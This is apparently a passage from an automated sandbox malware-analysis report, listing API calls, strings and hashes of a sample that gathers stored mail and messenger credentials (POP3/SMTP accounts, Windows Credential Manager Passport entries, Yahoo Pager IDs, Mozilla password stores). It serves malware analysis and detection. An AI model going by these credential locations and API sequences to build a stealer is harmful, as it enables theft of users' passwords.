                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,004082A2,?,000000FD,00000000,00000000,?,00000000,004082A2,?,?,?,?,00000000), ref: 004081A9
                                          • LocalFree.KERNEL32(?,?,?,?,?,00000000,76DBEB20,?), ref: 004081B9
                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWide_mbscpymemcpymemsetstrlen
                                          • String ID: POP3_credentials$POP3_host$POP3_name
                                          • API String ID: 524865279-2190619648
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ItemMenu$CountInfomemsetstrchr
                                          • String ID: 0$6
                                          • API String ID: 2300387033-3849865405
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpystrlen$memsetsprintf
                                          • String ID: %s (%s)
                                          • API String ID: 3756086014-1363028141
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _mbscat$memsetsprintf
                                          • String ID: %2.2X
                                          • API String ID: 125969286-791839006
                                          APIs
                                            • Part of subcall function 00406D01: CreateFileA.KERNEL32(eBD,80000000,00000001,00000000,00000003,00000000,00000000,004441A1,?,ACD,00444265,?,?,*.oeaccount,ACD,?), ref: 00406D13
                                          • GetFileSize.KERNEL32(00000000,00000000,?,00000000,ACD,00444265,?,?,*.oeaccount,ACD,?,00000104), ref: 004441B0
                                          • ??2@YAPAXI@Z.MSVCRT ref: 004441C2
                                          • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 004441D1
                                            • Part of subcall function 00407560: ReadFile.KERNEL32(00000000,?,004441E4,00000000,00000000,?,?,004441E4,?,00000000), ref: 00407577
                                            • Part of subcall function 00444059: wcslen.MSVCRT ref: 0044406C
                                            • Part of subcall function 00444059: ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                            • Part of subcall function 00444059: WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                            • Part of subcall function 00444059: strlen.MSVCRT ref: 004440D1
                                            • Part of subcall function 00444059: memcpy.MSVCRT ref: 004440EB
                                            • Part of subcall function 00444059: ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                          • ??3@YAXPAX@Z.MSVCRT ref: 004441FC
                                          • CloseHandle.KERNEL32(?), ref: 00444206
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                          • String ID: ACD
                                          • API String ID: 1886237854-620537770
                                          APIs
                                          • memset.MSVCRT ref: 004091EC
                                          • sprintf.MSVCRT ref: 00409201
                                            • Part of subcall function 0040929C: memset.MSVCRT ref: 004092C0
                                            • Part of subcall function 0040929C: GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                            • Part of subcall function 0040929C: _mbscpy.MSVCRT ref: 004092FC
                                          • SetWindowTextA.USER32(?,?), ref: 00409228
                                          • EnumChildWindows.USER32(?,Function_00009164,00000000), ref: 00409238
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$ChildEnumPrivateProfileStringTextWindowWindows_mbscpysprintf
                                          • String ID: caption$dialog_%d
                                          • API String ID: 2923679083-4161923789
                                          APIs
                                          Strings
                                          • unknown error, xrefs: 004277B2
                                          • no such savepoint: %s, xrefs: 00426A02
                                          • cannot release savepoint - SQL statements in progress, xrefs: 00426A20
                                          • abort due to ROLLBACK, xrefs: 00428781
                                          • cannot open savepoint - SQL statements in progress, xrefs: 00426934
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: abort due to ROLLBACK$cannot open savepoint - SQL statements in progress$cannot release savepoint - SQL statements in progress$no such savepoint: %s$unknown error
                                          • API String ID: 3510742995-3035234601
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset
                                          • String ID: GROUP$H$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
                                          • API String ID: 2221118986-3608744896
                                          APIs
                                          • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,0040FE66,00000000,?), ref: 004101E6
                                          • memset.MSVCRT ref: 00410246
                                          • memset.MSVCRT ref: 00410258
                                            • Part of subcall function 004100CC: _mbscpy.MSVCRT ref: 004100F2
                                          • memset.MSVCRT ref: 0041033F
                                          • _mbscpy.MSVCRT ref: 00410364
                                          • CloseHandle.KERNEL32(?,0040FE66,?), ref: 004103AE
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memset$_mbscpy$CloseHandleOpenProcess
                                          • String ID:
                                          • API String ID: 3974772901-0
                                          APIs
                                          • wcslen.MSVCRT ref: 0044406C
                                          • ??2@YAPAXI@Z.MSVCRT ref: 00444075
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,004441FB,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,004441FB,?,00000000), ref: 0044408E
                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433A0
                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433BE
                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 004433D9
                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443402
                                            • Part of subcall function 0044338B: ??2@YAPAXI@Z.MSVCRT ref: 00443426
                                          • strlen.MSVCRT ref: 004440D1
                                            • Part of subcall function 004434FC: ??3@YAXPAX@Z.MSVCRT ref: 00443507
                                            • Part of subcall function 004434FC: ??2@YAPAXI@Z.MSVCRT ref: 00443516
                                          • memcpy.MSVCRT ref: 004440EB
                                          • ??3@YAXPAX@Z.MSVCRT ref: 0044417E
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??2@$??3@$ByteCharMultiWidememcpystrlenwcslen
                                          • String ID:
                                          • API String ID: 577244452-0
                                          APIs
                                            • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                                            • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                                          • _strcmpi.MSVCRT ref: 00404518
                                          • _strcmpi.MSVCRT ref: 00404536
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: _strcmpi$memcpystrlen
                                          • String ID: imap$pop3$smtp
                                          • API String ID: 2025310588-821077329
                                          APIs
                                          • memset.MSVCRT ref: 0040C02D
                                            • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                            • Part of subcall function 00408DB6: memcpy.MSVCRT ref: 00408EBE
                                            • Part of subcall function 00408DB6: _mbscpy.MSVCRT ref: 00408E31
                                            • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                            • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                            • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                            • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407725
                                            • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                            • Part of subcall function 004076B7: memcpy.MSVCRT ref: 00407743
                                            • Part of subcall function 004074EA: _mbscpy.MSVCRT ref: 00407550
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                          • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                          • API String ID: 2726666094-3614832568
                                          APIs
                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                          • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                          • OpenClipboard.USER32(?), ref: 0040C1B1
                                          • GetLastError.KERNEL32 ref: 0040C1CA
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                          • String ID:
                                          • API String ID: 2014771361-0
                                          APIs
                                          • memcmp.MSVCRT ref: 00406151
                                            • Part of subcall function 0040607F: memcmp.MSVCRT ref: 0040609D
                                            • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060CC
                                            • Part of subcall function 0040607F: memcpy.MSVCRT ref: 004060E1
                                          • memcmp.MSVCRT ref: 0040617C
                                          • memcmp.MSVCRT ref: 004061A4
                                          • memcpy.MSVCRT ref: 004061C1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcmp$memcpy
                                          • String ID: global-salt$password-check
                                          • API String ID: 231171946-3927197501
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          APIs
                                          • GetClientRect.USER32(?,?), ref: 004016A3
                                          • GetSystemMetrics.USER32(00000015), ref: 004016B1
                                          • GetSystemMetrics.USER32(00000014), ref: 004016BD
                                          • BeginPaint.USER32(?,?), ref: 004016D7
                                          • DrawFrameControl.USER32(00000000,?,00000003,00000008), ref: 004016E6
                                          • EndPaint.USER32(?,?), ref: 004016F3
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                          • String ID:
                                          • API String ID: 19018683-0
                                          APIs
                                          • memset.MSVCRT ref: 0040644F
                                          • memcpy.MSVCRT ref: 00406462
                                          • memcpy.MSVCRT ref: 00406475
                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                            • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                            • Part of subcall function 00404888: memcpy.MSVCRT ref: 004048FC
                                            • Part of subcall function 00404888: memcpy.MSVCRT ref: 0040490E
                                          • memcpy.MSVCRT ref: 004064B9
                                          • memcpy.MSVCRT ref: 004064CC
                                          • memcpy.MSVCRT ref: 004064F9
                                          • memcpy.MSVCRT ref: 0040650E
                                            • Part of subcall function 00406286: memcpy.MSVCRT ref: 004062B2
                                          Memory Dump Source
                                          • Source File: 00000015.00000002.1995417415.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_21_2_400000_wab.jbxd
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID:
                                          • API String ID: 438689982-0
                                          APIs
                                            • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                                            • Part of subcall function 004045DB: LoadLibraryA.KERNEL32(advapi32.dll,?,0040F708,?,00000000), ref: 004045E8
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(00000000,CredReadA), ref: 00404601
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredFree), ref: 0040460D
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredDeleteA), ref: 00404619
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateA), ref: 00404625
                                            • Part of subcall function 004045DB: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404631
                                            • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                                            • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000100,000000FF,00000000,00000000,?,?,?,?,00000000), ref: 0040F7AE
                                          • strlen.MSVCRT ref: 0040F7BE
                                          • _mbscpy.MSVCRT ref: 0040F7CF
                                          • LocalFree.KERNEL32(00000000,?,00000000), ref: 0040F7DC
                                          Strings
                                          Similarity
                                          • API ID: AddressProc$LibraryLoad_mbscpy$ByteCharFreeLocalMultiWidestrlen
                                          • String ID: Passport.Net\*
                                          • API String ID: 2329438634-3671122194
                                          • Opcode ID: 0af64cc57546a9fbf77b674907fee208d195fdaa1b5113e78288b1972eb9facf
                                          • Instruction ID: cbd5109d0b46f6ae46d16b49076c688dceaf9cc559dd015bf255ce3d8649dee3
                                          • Instruction Fuzzy Hash: 98316F76900109ABDB10EFA6DD45DAEB7B9EF89300F10007BE605F7291DB389A04CB59
                                          APIs
                                            • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                          • memset.MSVCRT ref: 0040330B
                                          • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                          • strchr.MSVCRT ref: 0040335A
                                            • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                          • strlen.MSVCRT ref: 0040339C
                                            • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                          Strings
                                          Similarity
                                          • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                          • String ID: Personalities
                                          • API String ID: 2103853322-4287407858
                                          • Opcode ID: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                          • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                          • Opcode Fuzzy Hash: bc8f70af08f30ec4db56d6fcc791bb65d74b30dbc9844da0e0792c070d737bbb
                                          • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                          APIs
                                          • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0041087A
                                          • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 00410887
                                          • memcpy.MSVCRT ref: 004108C3
                                          Strings
                                          • 00000000-0000-0000-0000-000000000000, xrefs: 00410882
                                          • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 00410875
                                          Similarity
                                          • API ID: FromStringUuid$memcpy
                                          • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                          • API String ID: 2859077140-3316789007
                                          • Opcode ID: 1bd0dfdd33b944ccaa92fc0adafc19938dd855d0ba2d869dfbea71798e3d1944
                                          • Instruction ID: 2d05171d55a2aa7530ad5e51965ca7b7e6a6868cf32f938cfe5ee3e9f977ce1c
                                          • Instruction Fuzzy Hash: BD016D7690412DBADF01AE95CD40EEB7BACEF49354F044123FD15E6150E6B8EA84CBE4
                                          APIs
                                          • memset.MSVCRT ref: 00444573
                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                            • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00401C6A,?,?,?,?,00401C6A,?,?,?), ref: 00410AF8
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                          Strings
                                          Similarity
                                          • API ID: CloseOpenQueryValuememset
                                          • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                          • API String ID: 1830152886-1703613266
                                          • Opcode ID: baf3755ad005164e852b951840563bf60568ed10c800e15668adf960084471f0
                                          • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                          • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memset
                                          • String ID: H
                                          • API String ID: 2221118986-2852464175
                                          • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                          • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                          • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memcpy
                                          • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                          • API String ID: 3510742995-3170954634
                                          • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                          • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                          • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memcpy$memset
                                          • String ID: winWrite1$winWrite2
                                          • API String ID: 438689982-3457389245
                                          • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                          • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                          • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: winRead
                                          • API String ID: 1297977491-2759563040
                                          • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                          • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                          • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: memcpymemset
                                          • String ID: gj
                                          • API String ID: 1297977491-4203073231
                                          • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                          • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                          • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                          APIs
                                          • GetParent.USER32(?), ref: 004090C2
                                          • GetWindowRect.USER32(?,?), ref: 004090CF
                                          • GetClientRect.USER32(00000000,?), ref: 004090DA
                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                          • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                          Similarity
                                          • API ID: Window$Rect$ClientParentPoints
                                          • String ID:
                                          • API String ID: 4247780290-0
                                          • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                          • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                          • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                          APIs
                                            • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                                            • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                                            • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                                          • SetBkMode.GDI32(?,00000001), ref: 0041079E
                                          • GetSysColor.USER32(00000005), ref: 004107A6
                                          • SetBkColor.GDI32(?,00000000), ref: 004107B0
                                          • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                                          • GetSysColorBrush.USER32(00000005), ref: 004107C6
                                          Similarity
                                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                                          • String ID:
                                          • API String ID: 2775283111-0
                                          • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                                          • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                                          • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                                          APIs
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                                          Strings
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                          • String ID: winSeekFile$winTruncate1$winTruncate2
                                          • API String ID: 885266447-2471937615
                                          • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                                          • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                                          • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _strcmpi$_mbscpy
                                          • String ID: smtp
                                          • API String ID: 2625860049-60245459
                                          • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                          • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                          • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                          APIs
                                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                          • memset.MSVCRT ref: 00408258
                                            • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                          Strings
                                          • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                          Similarity
                                          • API ID: Close$EnumOpenmemset
                                          • String ID: Software\Google\Google Desktop\Mailboxes
                                          • API String ID: 2255314230-2212045309
                                          • Opcode ID: b9c6ba0a09f39c77023865a56f43d31249d27d4aeb116fb61def55debc704f1d
                                          • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                          • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                          APIs
                                          • memset.MSVCRT ref: 0040C28C
                                          • SetFocus.USER32(?,?), ref: 0040C314
                                            • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                          Strings
                                          Similarity
                                          • API ID: FocusMessagePostmemset
                                          • String ID: S_@$l
                                          • API String ID: 3436799508-4018740455
                                          • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                          • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                          • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                          APIs
                                          • memset.MSVCRT ref: 004092C0
                                          • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                          • _mbscpy.MSVCRT ref: 004092FC
                                          Strings
                                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                          Similarity
                                          • API ID: PrivateProfileString_mbscpymemset
                                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                          • API String ID: 408644273-3424043681
                                          • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                          • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                          • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _mbscpy
                                          • String ID: C^@$X$ini
                                          • API String ID: 714388716-917056472
                                          • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                          • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                          • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                          APIs
                                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                          Strings
                                          Similarity
                                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                          • String ID: MS Sans Serif
                                          • API String ID: 3492281209-168460110
                                          • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                          • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                          • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: ClassName_strcmpimemset
                                          • String ID: edit
                                          • API String ID: 275601554-2167791130
                                          • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                          • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
